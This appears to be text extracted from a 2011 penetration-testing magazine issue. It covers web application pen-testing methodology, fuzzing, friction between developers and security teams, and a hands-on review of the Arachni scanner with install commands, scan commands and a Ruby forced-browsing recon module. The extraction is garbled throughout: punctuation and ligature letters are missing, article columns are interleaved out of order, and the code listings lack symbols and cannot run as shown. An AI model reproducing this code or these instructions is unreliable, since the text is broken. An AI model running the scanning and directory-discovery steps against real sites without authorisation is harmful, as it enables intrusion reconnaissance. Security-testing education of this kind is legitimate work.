How Web Application Pen Testing WorksMost of the web applicationsrsquo penetration testing is carried out from security operations centers where the access to the resources under test will be remotely over the Internet using different penetration technologies At the end of such test the application penetration test provides a comprehensive security assessment for various types of applications (eg commercial enterprise web applications internally developed applications web-based portal and e-commerce application) Figure-1 describes some of the activities that usually happen during the pen testing process Some of the testing processes that are used to achieve the security vulnerabilities assessment such as Application Spidering Authentication Testing Session Management Testing Data Validation Testing Web Service Testing Ajax Testing Business Logic Testing Risk Assessment and Reporting
In conducting the web penetration testing different approaches can be used to achieve the security vulnerabilities assessment some of these approaches are
bull Zero-Knowledge Test (Black Box) ndash In such ap-proach the application security testing team will not have any of inside information about the target
environment and the expected knowledge gain will be based on information that can be found out in the public domain This type of test is designed to provide the most realistic penetration test possible since in many cases attackers start with no real knowledge of the target systems
bull Partial Knowledge Test (Gray Box) ndash In such ap-proach a partial gain of knowledge about the environment under testing will be achieved before conducting the test
bull Source Code Analysis (White Box) ndash In such ap-proach the penetration test team has fill information about the application and its source code In such test the security team will do a code review (line-by-line) in attempt to find any flaws that could allow attackers to take control of the application perform a denial of service attack against it or use such flaws to gain access to the internal network
Itrsquos also important to point out that penetration testing can be achieved through two different types of testing
bull External Penetration Testing bull Internal Penetration Testing
Both types of testing can be conducted with least information (black box) and also can be conducted with limited information (white box)
Figure 2 The different phases of the Pen Testing
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
Figure-3 shows different procedures and steps that can be used to conduct the penetration testing The following are the description of these steps
bull Scope and Plan ndash In this step the scope of the penetration testing is identified and the project plan and resources will be defined
bull System Scan and Probe ndash In this step the system scanning under the defined scope of the project will be conducted where the automated scanners will examine the open ports scanning the system to detect vulnerabilities and hostnames and IP addresses previously collected will be used at this stage
bull Creating of Attack Strategies ndash In this step the testers prioritize the systems and the attack methods will be used based on the type of the system and how critical these systems Also in this stage the penetration testing tools will be selected based on the vulnerabilities detected from the previous phase
bull Penetration Testing ndash In this step the exploitation of vulnerabilities using the automated tools will be conducted where the attacking methods designed in the previous phase will be used to conduct the following tests data amp service pilferage test buffer overflow privilege escalation and denial of services (if applicable)
bull Documentation ndash In this step all the vulnerabilities discovered during the test are documented evidence of exploitation and penetration testing findings are also recommended to be presented later within the final report
bull Improvement ndash The final step of the penetration testing is to provide the corrective actions on
closing the discovered vulnerabilities within the systems and the web applications
Web Applications Testing ToolsThrough the Pen testing a specific structure methodology has to be followed where the following steps might be used Enumeration Vulnerabilities Assessment and Exploitation Some of the tools that might be used within these steps are
bull Port Scannersbull Sniffersbull Proxy Serversbull Site Crawlersbull Manual Inspection
The output from the above tools will allow the security team to gather information about the environment such as Open ports Services Versions and Operating Systems The vulnerabilities assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s) application server (s) database server (s) and any intermediary devices such as firewalls and load-balancers Itrsquos also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities manual inspection for items such as HTTP responses hidden fields and HTML page sources should be part of the security assessment as well
Some of the areas that can be covered during the vulnerabilities assessment are the following
bull Input validationbull Access Control
Figure 3 Testing techniques procedures and steps
WEB APP SECURITY
Page 16 httppentestmagcom012011 (1) November Page 17 httppentestmagcom012011 (1) November
bull Authentication and Session Management (Session ID flaws) Vulnerabilities
bull Cross Site Scripting (XSS) Vulnerabilities bull Buffer Overflowsbull Injection Flawsbull Error Handlingbull Insecure Storagebull Denial of Service (if required)bull Configuration Managementbull Business logic flawsbull SQL Injection faultsbull Cookie manipulation and poisingbull Privilege escalationbull Command injectionbull Client side and header manipulation bull Unintended information disclosure
During the assessment testing the above vulnerabilities is performed except those that could cause a Denial of Service conditions and usually discussed beforehand Possible options of Denial of Service testing include testing during a specific time testing a development system or manually verifying the condition that may be responsible for the vulnerability Once the vulnerabilities assessment is complete the final reports recommendations and comments are summarized and better solutions are suggested for the implementation process Once the above assessments are done the penetration test is half-way done and the most important part of the assessment has to be delivered which is the informative report thatrsquos highlights all the risks found during the penetration phase
The following are some of the commonly used tools for traditional penetration testing
Port ScannersSuch tools are used to gather information about which network services are available for connection on each target host The port scanning tools usually examines or questions each of the designated network ports or service on the target system Most of these tools are able to scan both TCP as well as UDP ports Another common feature of port scanners is their ability to examine the operating system type and its version number since protocol such as TCPIP implementation can vary in their specific responses The configuration flexibility in the port scanners serve examining the different port configuration as well as employ the ability to hide from the network intrusion detection mechanisms
Vulnerability ScannersWhile port scanners only produce an inventory of the types of available services the vulnerability scanners
attempt to exercise vulnerabilities on their targeted systems The main goal of the vulnerability scanners is to provide an essential means of meticulously examining each and every available network service on the targeted hosts These scanners work from a database of documented network service security defects and exercising each defect on each available service of the target hosts Most of the commercial and the open source scanners scan the operating system for known weaknesses and un-patched software as well as configuration problems such as user permission management defects or problem with file access controls Despite the fact that both network-based and host-based vulnerability scanners do little to help web application-level penetration test they are fundamental tools for any penetration testing Good examples for such tools are Internet Scanners QualysGuard or Core Impact
Application ScannersMost of the application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against the application Popular commercial application scanners include Appscan and WebInspect
Web application Assessment ProxyAssessment proxies work by interposing themselves between the web browsers used by the testers and the target web server where data can be viewed and manipulated Such flexibility adds different tricks to exercise the applicationrsquos weaknesses and its associated components For example the penetration testers can view all cookies hidden HTML fields and other data used by the web application and attempt to manipulate their values to trick the application
The above penetration testing practice called a black box testing Some organizations use hybrid approaches where the traditional penetration testing along with some level of source code analysis of the web application is used Most of the penetration testing tools can perform the penetration testing practices however choosing the right tool for the job is something vital for the success of the penetration process and the accurate results
The following are some of the common features that should be implemented within the penetration testing tools
bull Visibility ndash The tool must provide the required visibility for the testing team that can be used as a feedback and reporting feature of the test results
bull Extensibility ndash The tool can be customized and it must provide scripting language or plug-in
WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
capabilities that can be used to construct cust-omized the penetration testing
bull Configurability ndash Having the tool that can be configurable is highly recommended to ensure the flexibility of the implementation process
bull Documentation ndash The tool should provide the right documentation that can provide clear explanation for the probes performed during the penetration testing
bull License Flexibility ndash The tool that has the flexibility of use without specific constraints such as a particular IP range of numbers and license limits is a better tool than others
Security Techniques for Web Apps Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are
bull Sanitize the data coming from the browser ndash Any data that is sent by the browser can never be trusted (eg submitted form data uploaded files cookies data XML etc) If web developers fail to sanitize the incoming data from unwanted data it might lead to vulnerabilities such as SQL injection cross site scripting and other attacks against the web application
bull Validate data before form submission and manage sessions ndash To avoid Cross Site Request Forgery (CSRF) that can occur when a web application accepts form submission data without verifying if it came from a user web form It is imperative for the web application to verify that the user form is the one that the web application had produced and served
bull Configure the server in the best possible way ndash network administrators have to follow some guidelines for hardening the web servers Some of these guidelines are Maintain and update proper security patches kill all the redundant services and shutdown unnecessary ports confine access rights to folders and files employ SSH (Secure Shell network protocol) rather than using telnet or FTP and install efficient anti-malware software
In addition to the above guidelines it is always important to implement strong passwords for the web applications users and cleaning stored passwords
ConclusionA vulnerability assessment is the process of identifying prioritizing quantifying and ranking the vulnerabilities in a system where such process determines if there is
a weakness or vulnerabilities in the system subjected to the assessment Penetration testing includes all of the process in vulnerabilities assessment plus the exploitation of vulnerabilities found in the discovery phase
Unfortunately an all clear result from a penetration test doesnrsquot mean that an application has no problems Penetration tests can miss weakness such as session forging and brute-forcing detection and as such implementing security throughout an applicationrsquos lifecycle is imperative process for building secure web applications
As automated web application security tools have matured in the recent years and over time automated security assessment will continue to both reduce any uncertainty of determination (ie false positive results) and the potential to miss some issues (ie false negatives results)
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications Currently the automated tools canrsquot be entirely used as a replacement of the manual penetration test However if the automated tools are used correctly organizations can save a lot of money and time in finding broad range of technical security vulnerabilities in web applications The manual penetration testing can be used to augment the results of the logical vulnerabilities found as a result of using the automated testing
Finally it is important to point out that over time the manual testing for technical vulnerabilities will increase from difficult to impossible as web applications size and the scope of such applications and their complexity increase The fact that many enterprise organizations will not be able to dedicate the time money and the effort required to assess the thousands of web applications will increase the chances of using the automated tools rather than using the human factor to manually testing these applications Also relying on human efforts to test for thousands of technical vulnerabilities within these applications is subject to the human errors and simply canrsquot be trusted
BRYAN SOLIMANBryan Soliman is a Senior Solution Designer currently working with Ontario Provincial Government of Canada He has over twenty years of Information Technology experience with Bachelor degree in Engineering bachelor degree in Computer Science and Master degree in Computer Science
WHAT IS A GOOD FUZZING TOOLFuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software It is based on sending anomalous (invalid or unexpected) data to the test target - the same method that is used by hack-ers and security researchers when they look for weaknesses to exploit There are no false positives if the anomalous data causes abnormal reaction such as a crash in the target software then you have found a critical security flaw
In this article we will highlight the most important requirements in a fuzzing tool and also look at the most common mistakes people make with fuzzing
Documented test cases When a bug is found it needs to be documented for your internal developers or for vulnerability management towards third party developers When there are billions of test cases automated documentation is the only possi-ble solution
Remediation All found issues must be reproduced in order to fix them Network recording (PCAP) and automated reproduction packages help you in delivering the exact test setup to the develop-ers so that they can start developing a fix to the found issues
MOST COMMON MISTAKES IN FUZZINGNot maintaining proprietary test scripts Proprietary tests scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported
Ticking off the fuzzing check-box If the requirement for testers is to do fuzzing they almost always choose the quick and dirty solution This is almost always random fuzzing Test requirements should focus on coverage metrics to ensure that testing aims to find most flaws in software
Using hardware test beds Appliance based fuzzing tools become outdated really fast and the speed requirements for the hardware increases each year Software-based fuzzers are scalable in performance and can easily travel with you where testing is needed and are not locked to a physical test lab
Unprepared for cloud A fixed location for fuzz-testing makes it hard for people to collaborate and scale the tests Be prepared for virtual setups where you can easily copy the setup to your colleagues or upload it to cloud setups
PROPERTIES OF A GOOD FUZZING TOOLThere are abundance of fuzzing tools available How to distin-guish a good fuzzer what are the qualities that a fuzzing tool should have
Model-based test suites Random fuzzing will certainly give you some results but to really target the areas that are most at risk the test cases need to be based on actual protocol models This results in huge improvement in test coverage and reduction in test execu-tion time
Easy to use Most fuzzers are built for security experts but in QA you cannot expect that all testers understand what buffer overflows are Fuzzing tool must come with all the security know-how built-in so that testers only need the domain expertise from the target system to execute tests
Automated Creating fuzz test cases manually is a time-consuming and difficult task A good fuzzer will create test cases automatically Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks
Test coverage Better test coverage means more discovered vulnerabilities Fuzzer coverage must be measurable in two aspects specification coverage and anomaly coverage
Scalable Time is almost always an issue when it comes to testing User must also have control on the fuzzing parameters such as test coverage In QA you rarely have much time for testing and therefore need to run tests fast Sometimes you can use more time in testing and can select other test completion criteria
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
Application Security members are considered like the tax man asking for money Security is sometimes seen as a cost to pay in order to get
an application into Production Actually it is a little of everyones fault Since Security people and Developers usually do not talk the same language it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve Letrsquos take a step back for a minute and let me clarify what I mean about language and communication Consider this scenario The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation Marketers usually do not know anything about technology and they just want to hit the market with an aggressive campaign on the new product line Marketers might ask the developers something like Give us the latest Web 20 Social website enabled or something like that to impress the customers Plus they would like it as soon as possible and they provide a deadline that the developers must keep The developers brainstorm the idea write out some specifications and requirements start prototyping their ideas and eventually begin coding They are under pressure to meet the deadline and management usually presses even more to meet the proposed deadline Security slowly is pushed aside so that the coding and production can meet the deadline Most software architecture is not designed with security in mind and in project Gantt Charts there usually
are no security checkpoints included for code testing or allow time for security fixes or remediation
Developers are pushed to code the application so that they can meet the deadline Acceptance tests and functionality tests are passed and the application is almost ready for deployment when someone recalls something about security Hey we need to get this on-line So we need to open up firewall to allow access to it
The Security Application group asks for additional information about the application and request docu-mentation of how the application was built They do not see it from the developersrsquo point of view of meeting the deadline that Management has imposed on them
On the other side developers do not see the problem from a security perspective What risks to IT infrastructure will potentially be exposed if someone breaks into the new application
One solution to the problem is to execute a penetration tests on the application and look at the results Then security is happy since they can test the application and developers are happy once the penetration test report is complete Many times a Penetration Test report contains recommended mitigation steps that impose additional time restraints on the application delivery Reports usually contain just the symptom For example the report might have statements like a SQL injection is possible not the real root cause a parameter taken from a config file is not sanitized before utilization The report does not contain all
Developers are from Venus Application Security guys from
Mars
We know that Application Security people talk a different language than developers do whenever we publish a report make an assessment or when we review a software architecture from a security point of view There is a gap between developers and the Application Security group The two teams must interact with each other to reach the same goal of building secure code
WEB APP SECURITY
Page 20 httppentestmagcom012011 (1) November Page 21 httppentestmagcom012011 (1) November
but which is the right one to use to insure secure code development
NET has one single monolithic framework and Microsoft has invested money in security and it seems they did it the right way but it is not Open Source so professionals cannot contribute A generic framework based solution is not feasible What about APIrsquos Developers do know how to use APIrsquos and having security controls embedded into a single library can save the day when writing source code That is why OWASP introduced ESAPI project to provide a set of APIrsquos that developers can use to embed security controls into their code
The requested effort is minimal if compared to translate implement a filter policy into running code and you (as a security professional) now speak the same language as the developer This is a win-win approach The security team and the application developers are now on the same page and everyone is happy There is a third approach I will cover in a follow-up article It is the BDD approach BDD is the acronym for Behavior Driven Development which means that you start writing test cases (taking examples from the Ruby on Rails world you write most of time test beds using rspec and cucumber) modeling how the source code has to behave accordingly to the documentation or requirements specification Initially when you execute the test cases against your application there will probably be failures that need to be corrected The idea is straightforward Using the WAPT activity instead of a implement a filtering policy statement you will produce a set of rspeccucumber scenarios modeling how the source code can deal with malformed input Then the development team starts correcting the code until it passes all of the test cases and when testing is complete and all tests pass it will mean your source code has implemented a filtering policy How has development changed A new approach has been created to insure that the developers implement your remediation statement Now the developers understand how to handle malformed entry statements and why they are so important to the Application Security group
The next article we will see how to write some security tests using the BDD approach in order to help a generic Lava developer to deal with cross-site scripting vulnerabilities
of the information necessary to solve the problems at first glance The developers cannot mitigate all of the issues in time to meet the deadline so many times bug fixes are prolonged or pushed into the next revision of the software and in some cases they are never fixed Another problem is when the two groups talk to each other at the end of the whole process and they use a non-common-ground language that further confuses or annoys everyone and further pushes the groups further apart
Communications Breakdown You Give Me The ReportPenetration test reports are most of the times useless from the developers point of view because they do not give specific information where they can pinpoint where the problem is This is very ironic because the developers need to take full advantage of the security report since most of remediation is source code fixes
Security issues found in Penetration testing is not for the faint of heart There can be a lot of high-level security issues grouped by OWASP Top 10 (most of time) with some generic remediation steps such as implement an input filtering policy This information may not mean anything to a source code developer They want to know what module class or line where the problem exists so that they can fix it If provided enough time developers can eventually determine where the problem exists but usually they do not have the time to look through all of the code to find every testing error and still have time to get the application into production
Letrsquos Close the GapWhat we need to do is define a common ground where security can be integrated into source code somewhat painlessly Security should be transparent from the deve-lopment teamrsquos point of view This can be achieved by
bull Create a development framework that has security built into it
bull Design an API to be used by the application
Putting security into the framework is the Rails approach Railsrsquo developers added a security facility inside the frameworkrsquos helpers so developers inherit the secure input filtering SQL injection protection and CSRF protection token This is a huge step forward to assist developers with this problem This methodology works with a programming language that contains a secure framework for developing web application This is true for the Ruby community (other frameworks like Sinatra do have some security facilities as well) With the Java programming language community there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGOPaolo Perego is an application security specialist interested in xing the code he just broke with a web application penetration test Hersquos interested in code review and hersquos working on his own hybrid analysis tool called aurora He loves Ruby on Rails kernel hacking playing guitar and playing Tae kwon-do ITF martial art Hersquos an husband and a daddy and a startup wannabe You may want to check out Paolorsquos blog or looking at his about me page
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
Arachni is not a so-called inspection proxy such as the popular commercial but low-cost Burp Suite or the freeware Zed Attack Proxy of the Open
Web Application Security project (OWASP) These tools are really meant to be used by a skilled consultant doing manual investigations of the application
Arachni can be better compared with commercial online scanners which will be directed to the application and produce a report with no further interaction by the user
Every security consultant or hacker must understand the strengths and weaknesses of his or her toolset and to must choose the best combination of tools possible for the job at hand Is Arachni worthwhile
Time for an in-depth review
Under the HoodAccording to the documentation Arachni offers the following
bull Simplicity everything is simple and straight-forward from a userrsquos or component developerrsquos point of view
bull A stable efficient and high-performance framework Arachni allows custom modules reports and plug-ins Developers can easily use the advanced framework features without knowing the nitty gritty details
Pulling the Legs of ArachniArachni is a fire-and-forget or point-and-shoot web application vulnerability scanner developed in Ruby by Tasos ldquoZapotekrdquo Laskos It got quite a good score for the detection of Cross-Site-Scripting and SQL Injection issues on the recently publicised vulnerability scanner benchmark by Shay-Chen
Table 1 Overview of Audit and Reconnaissance modules included with Arachni
Audit Modules Recon ModulesSQL injectionBlind SQL injection using rDiff analysisBlind SQL injection using timing attacksCSRF detectionCode injection (PHP Ruby Python JSP ASPNET)Blind code injection using timing attacks (PHP Ruby Python JSP ASPNET)LDAP injectionPath traversalResponse splittingOS command injection (nix Windows)Blind OS command injection using timing attacks (nix Windows)Remote le inclusionUnvalidated redirectsXPath injectionPath XSSURI XSSXSSXSS in event attributes of HTML elementsXSS in HTML tagsXSS in HTML script tags
Allowed HTTP methodsBack-up lesCommon directoriesCommon lesHTTP PUTInsufficient Transport Layer Protection for password formsWebDAV detectionHTTP TRACE detectionCredit Card number disclosureCVSSVN user disclosurePrivate IP address disclosureCommon backdoorshtaccess LIMIT miscongurationInteresting responsesHTML object grepperE-mail address disclosureUS Social Security Number disclosureForceful directory listing
WEB APP VULNERABILITIES
Page 22 httppentestmagcom012011 (1) November Page 23 httppentestmagcom012011 (1) November
talks to one or more dispatchers that will perform the scanning job New in the latest experimental branch is that dispatchers can communicate with each other and share the load (the Grid)
This is great if you want to speed up the scan or if you want to execute some crazy things like running
We can vouch that both simplicity and performance goals have been attained by Arachni Since the framework is still under heavy development stability is sometimes lacking but at no time this interfered with our vulnerability assessments
Arachni is highly modular both from an architecture point of view as a source code point of view The Arachni client (web or command-line) connects to one or more dispatchers that will execute the scan The connection to these dispatchers can be secured by SSL encryption and cert based authentication One dispatcher can handle multiple clients Multiple dispatchers can share a load and communicate with each other to optimise and speed-up the scanning process
The asynchronous scanning engine supports both HTTP and HTTPS and has pauseresume functionality Arachni supports upstream proxies (for SOCKS4 SOCKS4A SOCKS5 HTTP11 and HTTP10) as well as proxy authentication
The scanner can authenticate versus the web application using form-based authentication HTTP Basic and Digest Authentication and NTLM
At the start of every scan a crawler will try to detect all pages In version 03 this was optional but since version 04 the crawler will always be run at the start of the scan This crawler has filters for redundant pages based on regular expressions and counters and can include or exclude URLs based on regular expressions Optionally the crawler can also follow subdomains There is also an adjustable link count and redirect limit
The HTML parser can extract forms links cookies and headers It can graciously handle badly written HTML due to a combination of regular expression analysis and the Nokogiri HTML parser
Arachni offers a very simple and easy to use module API enabling a developer to access helper audit methods and writing custom modules in a matter of minutes Arachni already includes a large number of modules audit modules and reconnaissance (recon) modules Table 1 provides an overview
Arachni offers report management The following reports can be created standard output HTML XML TXT YAML serialization and the Metareport providing Metasploit integration for automated and assisted exploitation
Arachni has many build-in plug-ins that have direct access to the framework instance Plug-ins can be used to add any functionality to Arachni Table 2 provides an overview of currently available plug-ins
InstallationArachni consists of client-side (web or shell) and server-side functionality (the dispatchers) A client
Table 2 Included Arachni plug-ins Plug-ins have direct access to the framework instance and can be used to add any functionality to Arachni
Plug-insPassive Proxy Analyses requests and responses
between the web application and the browser assisting in AJAX audits logging-in andor restricting the scope of the audit
Form based AutoLogin Performs an automated login
Dictionary attacker Performs dictionary attacks against HTTP Authentication and Forms based authentication
Proler Performs taint analysis with benign inputs and response time analysis
Cookie collector Keeps track of cookies while establishing a timeline of the changes
Healthmap Generates a sitemap showing the health (vulnerability present or not) of each crawledaudited URL
Content-types Logs content-types of server responses aiding in the identication of interesting (possibly leaked) les
WAF (Web Application Firewall) Detector
Establishes a baseline of normal behaviour and uses rDiff analysis to determine if malicious inputs cause any behavioural changes
Metamodules Loads and runs high-level meta-analysis modules premidpost-scanAutoThrottle Dynamically adjusts HTTP throughput during the scan for maximum bandwidth utilizationTimeoutNotice Provides a notice for issues uncovered by timing attacks when the affected audited pages returned unusually high response times to begin with It also points out the danger of DOS (Denail-of-Service) attacks against pages that perform heavy-duty processingUniformity Reports inputs that are uniformly vulnerable across a number of pages hinting to the lack of a central point of input sanitization
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
your dispatchers in multiple geographic zones thanks to Amazon Elastic Compute Cloud (EC2) or similar cloud providers
Letrsquos get our hands dirty and start with the experimental branch (currently at version 04) so we can work with the latest and greatest functionality Another benefit is that this experimental version can work under Windows
Installation under Linux is quick and easy but a Windows set-up requires the installation of Cygwin first Cygwin is a collection of tools that provide a Linux-like environment on Windows as well as providing a large part of Linux APIs Another possibility is to run it natively in Windows using MinGW (Minimalistic GNU for Windows) but at this moment there are too many problems involved with that
LinuxInstallation under Linux is quite straightforward Open your favourite shell and execute the following commands Listing 1
This will install all source directories in your home directory Change all the cd commands if you want the sources somewhere else In case you need an update to the latest versions just cd into the three directories above and perform
$ git pull
$ rake install
Now you can hack the source code locally and play around with Arachni If you encounter a Typhoeus related error while running Arachni issue
$ gem clean
WindowsArachni comes with decent documentation but I had a chuckle when I read the installation instructions for Windows Windows users should run Arachni in Cygwin I knew that this was not going to be a smooth ride Since v03 some changes have been made to the experimental version to make it easier so here we go
Please note that these installation instructions start with the installation of Cygwin and all required dependencies
Install or upgrade Cygwin by running setupexe Apart from the standard packages include the following
bull Database libsqlite3-devel libsql3_0bull Devel doxygen libffi4 gcc4 gcc4-core gcc4-g++
git libxml2 libxml2-devel make openssl-develbull Editors nanobull Libs libxslt libxslt-devel libopenssl098 tcltk
libxml2 libmpfr4bull Net libcurl-devel libcurl4
Listing 1 Installation for Linux
$ sudo apt-get install libxml2-dev libxslt1-dev
libcurl4-openssl-dev libsqlite3-
dev
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ $ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
Listing 2 Installation for Windows
$ cd
$ git clone gitgithubcomeventmachine
eventmachinegit
$ cd eventmachine
$ gem build eventmachinegemspec
$ gem install eventmachine-100beta4gem
$ cd
$ git clone gitgithubcomArachniarachni-rpcgit
$ cd arachni-rpc
$ gem build arachni-rpcgemspec
$ gem install arachni-rpc-01gem
$ cd
$ git clone gitgithubcomZapotekarachnigit
$ cd arachni
$ git checkout experimental
$ rake install
WEB APP VULNERABILITIES
Page 24 httppentestmagcom012011 (1) November Page 25 httppentestmagcom012011 (1) November
Accept the installation of packages that are required to satisfy dependencies Note that some of your other tools might not work with these libraries or upgrades In any case an upgrade of Cygwin usually results in recompiling any tools that you compiled earlier
Some additional libraries are needed for the compilation of Ruby in the next step and must be compiled by hand First we need to install libffi Execute the following commands in your Cygwin shell
$ cd
$ git clone httpgithubcomatgreenlibffigit
$ cd libffi
$ configure
$ make
$ make install-libLTLIBRARIES
Next is libyaml Download the latest stable version of libyaml (currently 014) from http httppyyamlorgwikiLibYAML and move it to your Cygwin home folder (probably Ccygwinhomeyour _ windows _ id) Execute the following
$ cd
$ tar xvf yaml-014targz
$ cd yaml-014
$ configure
$ make
$ make install
Now we need to compile and install Ruby Download the latest stable release of Ruby (currently ruby-192-p290targz) from http httpwwwrubyorg and move it to your Cygwin home folder Execute the following commands in the Cygwin shell
$ cd
$ tar xvf ruby-192-p290targz
$ cd ruby-192-p290
$ configure
$ make
$ make install
From your Cygwin shell update and install some necessary modules
$ gem update ndashsystem
$ gem install rake-compiler
$ cd
$ git clone httpgithubcomdjberg96sys-proctablegit
$ cd sys-proctable
$ gem build sys-proctablegemspec
$ gem install sys-proctable-091-x86-cygwingem
Finally we can install Arachni (and the source) by executing the following commands in the Cygwin shell (note these are the same commands as with the Linux installation) Listing 2
In case of weird error-messages (especially on Vista systems) regarding fork during compilation execute the following in your Cygwin shell
$ find usrlocal -iname lsquosorsquo gt tmplocalsolst
Quit all Cygwin shells Use Windows to browse to Ccygwinbin Right click ashexe and choose run as administrator Enter in ash
$ binrebaseall
$ binrebaseall -T tmplocalsolst
Exit ash
Light my FireHow to fire up Arachni depends on whether you want to use it with the new (since version 03) web GUI or simply run everything through the command-line interface Note that the current web GUI does not support all functionality that is available from the command-line
The GUI can be started by executing the following commands
$ arachni_rpcd amp
$ arachni_web
After that browse to httplocalhost4567 and admire the new GUI You will need to attach the GUI to one or more dispatchers The dispatcher(s) will run the actual scan
Figure 1 Edit Dispatchers
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
If you want to use the command-line interface just execute
$ arachni --help
A quick overview of the other screens (Figure 1)
bull Start a Scan start a scan by entering the URL and pressing Launch scan After a scan is launched the screen gives an overview of what issues are detected and how far the process is
bull Modules enable or disable the more than 40 audit (active) and recon (passive) modules that scan for vulnerabilities such as Cross-Site-Scripting (XSS) SQL Injection (SQLi) Cross-Site-Request Forgery (CSRF) or detect hidden features or simply make lists of interesting items such as email addresses
bull Plugins plug-ins help to automate tasks Plug-ins are more powerful than modules and enable to script login sequences detect Web Application Firewalls (WAF) perform dictionary attacks hellip
bull Settings the settings screens allows to add cookies and headers limit the scan to certain directories hellip
bull Reports gives access to the scan reports Arachni creates reports in its own internal format and exports them to HTML XML or text
bull Add-ons three add-ons are installedbull Auto-deploy converts any SSH enabled Linux
box in an Arachni dispatcherbull Tutorial serves as an examplebull Scheduler schedules and run scan jobs at a
specific timebull Log overview of actions taken by the GUI
Your First ScanWe will use both the command-line and the GUI First the command-line start a scan with all modules active This is extremely easy
$ arachni httpwwwexamplecom --report =afroutfile=
wwwexamplecomafr
Afterwards the HTML report can be created by executing the following
$ arachni --repload=wwwexamplecomafr --report=html
outfile=wwwexamplecomhtml
Thatrsquos it Enabling or disabling modules is of course possible Execute the following command for more information about the possibilities of the command-line interface
$ arachni --help
Usually it is not necessary to include all recon modules Some modules will create a lot of requests making detection of your activities easier (if that is a problem with your assignment) and taking a lot more time to finish List all modules with the following command
$ arachni --lsmod
Enabling or disabling modules is easy use the --mods switch followed by a regular expression to include modules or exclude modules by prefixing the regular expression with a dash Example
$ arachni --mods= -xss_ httpwwwexamplecom
The above will load all modules except the module related with Cross-Site-Scripting (XSS)
Using the GUI makes this process even easier Open the GUI by browsing to httplocalhost4567 and accept the default dispatcher
Next steps are to verify the settings in the Settings Modules and Plugins screens Once you are satisfied proceed to the Start a Scan screen
If you want to run a scan against some test applications visit my blog for the list of deliberately vulnerable applications Most of these applications can be installed locally or can be attacked online (please read all related faqs and permissions before scanning a site In most jurisdictions this is illegal unless permission is explicitly granted by the owner)
After the scan just go the Reports screen and download the report in the format you wantFigure 2 Start a scan screen
WEB APP VULNERABILITIES
Page 26 httppentestmagcom012011 (1) November Page 27 httppentestmagcom012011 (1) November
Listing 3 Create your own module
=begin
Arachni
Copyright (c) 2010-2011 Tasos Zapotek Laskos
tasoslaskosgmailcom
This is free software you can copy and distribute
and modify
this program under the term of the GPL v20 License
(See LICENSE file for details)
=end
module Arachni
module Modules
Looks for common files on the server based on
wordlists generated from open
source repositories
More information about the SVNDigger wordlists
httpwwwmavitunasecuritycomblogsvn-digger-
better-lists-for-forced-browsing
The SVNDigger word lists were released under the GPL
v30 License
author Herman Stevens
see httpcwemitreorgdatadefinitions538html
class SvnDiggerDirs lt ArachniModuleBase
def initialize( page )
super( page )
end
def prepare
to keep track of the requests and not repeat them
__audited ||= Setnew
__directories ||=[]
return if __directoriesempty
read_file( all-dirstxt )
|file|
__directories ltlt file unless fileinclude( )
end
def run( )
path = get_path( pageurl )
return if __auditedinclude( path )
print_status( Scanning SVNDigger Dirs )
__directorieseach
|dirname|
url = path + dirname +
print_status( Checking for url )
log_remote_directory_if_exists( url )
|res|
print_ok( Found dirname at +
reseffective_url )
__audited ltlt path
def selfinfo
name =gt SVNDigger Dirs
description =gt qFinds directories
based on wordlists created from
open source repositories The
wordlist utilized by this module
will be vast and will add a consi
derable amount of
time to the overall scan time
author =gt Herman Stevens ltherman
stevensgmailcomgt
version =gt 01
references =gt
Mavituna Security =gt
httpwwwmavitunasecuritycom
blogsvn-digger-better-lists-for-
forced-browsing
OWASP Testing Guide =gt
httpswwwowasporgindexphp
Testing_for_Old_Backup_and_
Unreferenced_Files_(OWASP-CM-006)
targets =gt Generic =gt all
issue =gt
name =gt qA SVNDigger
directory was detected
description =gt q
tags =gt [ svndigger path
directory discovery ]
cwe =gt 538
severity =gt IssueSeverityINFORMATIONAL
cvssv2 =gt
remedy_guidance =gt Review these
resources manually Check if
unauthorized interfaces are exposed
or confidential information
remedy_code =gt
end
end
end
end
WEB APP VULNERABILITIES
Page 28 httppentestmagcom012011 (1) November
Create your Own ModuleArachni is very modular and can be easily extended In the following example we create a new reconnaissance module
Move into your Arachni source tree Yoursquoll find the modules directory In there yoursquoll find two directories audit and recon Move into the recon directory We will create our Ruby module
Arachni makes it real easy if your module needs external files it will search into a subdirectory with the same name Example if you create a svn_digger_dirsrb module this module is able to find external files in the modulesreconsvn_digger_dirs subdirectory
Our new reconnaissance module will be based on the SVNDigger wordlists for forced browsing These wordlists are based on directories found in open source code repositories
If there is a directory that needed to be protected and you forget that it will be found by a scanner that uses these wordlists
Furthermore it can be used as a basis for reconnaissance if a directory or file is detected this might provide clues about what technology the site is using
Download the wordlists from the above URL Create a directory modulesreconsvn_digger_dirs and move the file all-dirstxt from the wordlist archive to the newly created directory
Create a copy of the file modulesreconcommon_
directoriesrb and name it svn_digger_dirsrb Change the code to read as follows Listing 3
